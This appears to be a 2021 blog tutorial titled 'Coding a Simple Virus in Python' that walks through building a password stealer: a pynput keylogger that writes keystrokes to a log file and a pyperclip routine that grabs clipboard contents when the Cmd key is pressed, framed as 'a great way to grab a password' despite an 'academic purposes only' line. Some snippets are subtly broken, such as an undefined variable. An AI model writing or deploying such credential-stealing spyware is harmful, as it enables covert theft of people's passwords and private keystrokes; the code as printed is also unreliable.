Coding a Simple Virus in Python
Published January 17, 2021
This is a guide to coding a simple virus in Python that steals users passwords. This is for academic purposes only.
I’ll keep it simple, but feel free to check out a link to the more detailed tutorial at the bottom of this article.
When it comes to coding a password stealer — where do you start? There are a number of ways to attain passwords on a user’s machine. One of the traditional and still most commonly used ways is to build what’s known as a keylogger.
A keylogger in the cyber world is a piece of software that runs on a user’s machine and stores every key they press.
However, it’s worth knowing that many web browsers and softwares actively block events related to detecting key presses. This is the case with Google Chrome, where if you type into a password field, it will not trigger the key press events that you would usually expect.
More sophisticated keyloggers are written in low-level languages such C/C++. This is because you have closer access to the hardware and are therefore less reliant on other softwares (web browers) to tell you when keys are pressed.
Another technique you can use is to actively monitor the clipboard to detect what the user has copied. Let’s face it, many of us copy and paste passwords all the time. So this is a great way to grab a password. Funnily enough, rumour has it that TikTok actively store what’s on your clipboard periodically.
pynput is a fantastic library for storing key presses in Python. Here’s a quick snippet for importing the library, monitoring the keyboard and printing key presses:
from pynput.keyboard import Listener
def log_key_press(self):
key = str(key).replace("'", "")
print(f"Key Press: {key}")
with Listener(on_press=log_key_press) as l:
l.join()
Now although this is good, it doesn’t store it to a file for review later. You can do that simply by opening a file handler in Python in append mode and then logging the key presses to that file:
KEYSTROKE_LOG_FILE = './logs/keystroke.log'
with open(KEYSTROKE_LOG_FILE, 'a') as f:
line_to_write = f"{now}: Key Press - {key}"
f.write(f"{line_to_write}\n")
The above will help you get something basic up and running. But, as we mentioned, typing into password fields on a browser will not render the key press events you need. In other words, the above won’t work.
One way around that is to keep an eye on the clipboard. With the premise that users copy and paste passwords, this will render great results! You can use the pyperclip library in Python to do this.
Typically when a user pastes something, they do so with a key combination. Now on a Mac, this is Cmd + V. So, one easy way is to detect if a user has pressed Cmd and then just check the clipboard contents and store it in a file:
import pyperclip
if key == 'Key.cmd_r':
contents = pyperclip.paste()
print(contents)
Now this code is simple and will result in duplicates. Though, you can easily make changes to avoid this.
This was a very simple example of writing a password stealer in Python. Now you have a better understanding of the basics involved in building your own keylogger and pitfalls and things that you should be aware of going forward.
Feel free to check out the more detailed version of the tutorial here with the full code.